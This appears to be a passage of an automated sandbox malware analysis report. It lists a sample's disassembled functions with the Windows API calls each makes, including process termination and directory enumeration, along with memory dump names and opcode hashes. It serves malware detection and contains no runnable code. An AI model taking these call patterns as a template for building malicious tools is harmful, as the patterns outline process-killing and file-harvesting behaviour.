                  Function 008894D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 008894EB
                    • Part of subcall function 00888D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0088951E,00000000), ref: 00888D5B
                    • Part of subcall function 00888D50: RtlAllocateHeap.NTDLL(00000000), ref: 00888D62
                    • Part of subcall function 00888D50: wsprintfW.USER32 ref: 00888D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008895AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 008895C9
                  • CloseHandle.KERNEL32(00000000), ref: 008895D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: a4e44a8757ed7cd68e90117393113621e6964237238f5fab2854ca1b4514d810
                  • Instruction ID: 72e5afab6e53c2310db4f87e655fd1e9a2da61d49d2f924453623ae707094bd4
                  • Opcode Fuzzy Hash: a4e44a8757ed7cd68e90117393113621e6964237238f5fab2854ca1b4514d810
                  • Instruction Fuzzy Hash: 23313A71A0020CAFDB14EBE4CC49BEDB778FB58300F104559E506AB595DB74AA89CB52
                  Function 008892E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00883AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00883AEE,?), ref: 008892FC
                  • GetFileSizeEx.KERNEL32(000000FF,00883AEE), ref: 00889319
                  • CloseHandle.KERNEL32(000000FF), ref: 00889327
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: a45299a96a28b7b8bf732cf384a5355922666e0d51f23b07197da246b3eb3b1d
                  • Instruction ID: dbd69939f811c7d3081767177a080f34cdc152296c62cd108d0772acb34179ef
                  • Opcode Fuzzy Hash: a45299a96a28b7b8bf732cf384a5355922666e0d51f23b07197da246b3eb3b1d
                  • Instruction Fuzzy Hash: B4F03C75E44208BBDB10EBF0DC49BAE77B9FB58710F108294F651E72D0DA7096418B80
                  Function 0088C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 0088C74E
                    • Part of subcall function 0088BF9F: __amsg_exit.LIBCMT ref: 0088BFAF
                  • __getptd.LIBCMT ref: 0088C765
                  • __amsg_exit.LIBCMT ref: 0088C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0088C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 58b34eb31c0082b668f4b4d87ae4c70d3ebe5927d4e6533a01f88e6d21989474
                  • Instruction ID: 34b34d93acb09fb7e93480e85e927c7048b4a62cfb83e1465d25770db34266c2
                  • Opcode Fuzzy Hash: 58b34eb31c0082b668f4b4d87ae4c70d3ebe5927d4e6533a01f88e6d21989474
                  • Instruction Fuzzy Hash: 12F09A329056109BE724BBBC9807B4E33A0FF40724F24414AF614E62D6DF7869409FAB
                  Function 00884F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884F7A
                  • lstrcat.KERNEL32(?,00891070), ref: 00884F97
                  • lstrcat.KERNEL32(?,015D8A30), ref: 00884FAB
                  • lstrcat.KERNEL32(?,00891074), ref: 00884FBD
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 0088492C
                    • Part of subcall function 00884910: FindFirstFileA.KERNEL32(?,?), ref: 00884943
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                    • Part of subcall function 00884910: FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                    • Part of subcall function 00884910: FindClose.KERNEL32(000000FF), ref: 00884B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: e8850c9201085666355f31a823de7d9c2381592e2922280a1a6fa38b5a98fd82
                  • Instruction ID: 416a03eaf08dba007089e310b8e4adb585d1aa825ef77594e47cf86efc32a53e
                  • Opcode Fuzzy Hash: e8850c9201085666355f31a823de7d9c2381592e2922280a1a6fa38b5a98fd82
                  • Instruction Fuzzy Hash: 0A21B876900204ABCB54F7E4DC46EE9337CF764300F404694B659D2592EE759BC98B93